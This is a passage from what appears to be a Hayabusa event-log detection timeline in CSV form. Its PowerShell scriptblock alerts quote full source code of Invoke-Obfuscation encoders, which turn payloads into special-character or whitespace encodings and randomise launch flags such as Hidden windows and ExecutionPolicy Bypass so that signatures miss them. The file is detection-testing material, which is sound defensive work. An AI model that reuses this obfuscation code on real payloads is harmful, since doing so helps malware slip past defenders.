}${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? \""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. $NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.280 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"= $NewScript.Replace('^|','|') } } # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.280 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = 